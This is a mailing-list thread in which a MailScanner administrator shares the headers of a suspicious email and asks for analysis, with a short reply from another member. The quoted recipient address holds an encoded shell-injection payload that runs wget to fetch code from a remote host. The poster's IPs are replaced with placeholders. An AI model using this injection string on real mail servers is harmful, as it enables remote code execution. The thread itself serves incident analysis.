possible attack against MailScanner ?
Shawn Iverson
iversons at rushville.k12.in.us
Mon Jul 15 11:15:46 UTC 2019
That is, unless it originated from somewhere else...
On Mon, Jul 15, 2019 at 7:15 AM Shawn Iverson <iversons at rushville.k12.in.us>
wrote:
> Is that the start of a cron script in the email address field?
>
> If so, you need to fix that.
>
> On Mon, Jul 15, 2019 at 6:59 AM Heino Backhaus <
> heino.backhaus at fink-computer.de> wrote:
>
>> Hallo List,
>>
>> i need some help analysing the following email, i received last week.
>>
>> Mailwatch Mail-Metadata:
>>
>> Received: from sab.com (unknown [46.22.132.94])
>> by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
>> for <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*
>> x22}}@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
>> Received: 1
>> Received: 2
>> Received: 3
>> Received: 4
>> Received: 5
>> Received: 6
>> Received: 7
>> Received: 8
>> Received: 9
>> Received: 10
>> Received: 11
>> Received: 12
>> Received: 13
>> Received: 14
>> Received: 15
>> Received: 16
>> Received: 17
>> Received: 18
>> Received: 19
>> Received: 20
>> Received: 21
>> Received: 22
>> Received: 23
>> Received: 24
>> Received: 25
>> Received: 26
>> Received: 27
>> Received: 28
>> Received: 29
>> Received: 30
>> Received: 31
>>
>>
>>
>> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in
>> case...
>> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in
>> case...
>>
>> Versions:
>> MailWatch Version: 1.2.9
>> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
>> Postfix Version: 3.1.0
>> MailScanner Version: 5.1.2
>> ClamAV Version: 0.102.0-devel-20190715
>> SpamAssassin Version: 3.4.2
>> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
>> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>>
>> Can you help me to bring some light in this dark...
>>
>> --
>> Mit freundlichen Gruessen
>>
>> H. Backhaus
>>
>> Fink-Computer Systeme
>> Heggrabenstr. 9, 35435 Wettenberg
>> Email: heino.backhaus at fink-computer.de
>> Web: www.fink-computer.de
>> Fax: +49-641-98444638
>> Fon: +49-641-98444640
>> UST-ID: DE151040770
>> HRB: 2143 Gießen
>> GF: Fredi Fink
>>
>> I was gratified to be able to answer promptly, and I did.
>> I said I didn't know.
>> Mark Twain
>>
>>
>> --
>> Diese E-Mail wurde auf Viren und gefährliche Anhänge
>> durch *MailScanner* <http://www.mailscanner.info/> untersucht und ist
>> wahrscheinlich virenfrei.
>>
>>
>> --
>> MailScanner mailing list
>> mailscanner at lists.mailscanner.info
>> http://lists.mailscanner.info/mailman/listinfo/mailscanner
>>
>>
>
> --
> Shawn Iverson, CETL
> Director of Technology
> Rush County Schools
> 765-932-3901 option 7
> iversons at rushville.k12.in.us
>
> [image: Cybersecurity]
>
--
Shawn Iverson, CETL
Director of Technology
Rush County Schools
765-932-3901 option 7
iversons at rushville.k12.in.us
[image: Cybersecurity]
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.mailscanner.info/pipermail/mailscanner/attachments/20190715/4ee2e8c6/attachment.html>
More information about the MailScanner
mailing list